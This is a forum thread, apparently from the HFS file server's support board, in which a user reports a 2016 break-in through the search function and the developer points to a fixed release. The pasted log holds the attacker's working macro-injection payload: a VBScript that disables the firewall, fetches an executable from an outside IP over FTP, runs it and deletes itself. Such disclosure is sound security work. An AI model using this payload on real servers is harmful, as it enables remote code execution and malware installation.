Author Topic: Execution Exploit in search function  (Read 3487 times)

0 Members and 1 Guest are viewing this topic.

Offline apanx

  • Occasional poster
  • *
  • Posts: 1
    • View Profile
Execution Exploit in search function
« on: June 14, 2016, 09:18:05 PM »
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

Code: [Select]
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject(""wscript.shell""):objshell.run(""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*43.160.195.78>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 104.148.61.9 1740 Served 3.9 K
2016-06-13 15:58:52 104.148.61.9 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum
https://www.exploit-db.com/exploits/34668/
« Last Edit: June 14, 2016, 09:33:00 PM by apanx »

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1842
    • View Profile
Re: Execution Exploit in search function
« Reply #1 on: June 14, 2016, 09:59:59 PM »
Thank for report, rejetto is beginning to address the issue

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12888
    • View Profile
Re: Execution Exploit in search function
« Reply #2 on: June 14, 2016, 10:13:37 PM »
i'm sorry for the problem.
I'm working on it.

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12888
    • View Profile
Re: Execution Exploit in search function
« Reply #3 on: June 14, 2016, 10:58:23 PM »
please update to 2.3i

Offline Fysack

  • Tireless poster
  • ****
  • Posts: 590
  • present picture
    • View Profile
    • Admin
Re: Execution Exploit in search function
« Reply #4 on: September 30, 2017, 11:19:40 PM »
 ;D ;D ;D
GOD CAN READ YOUR MIND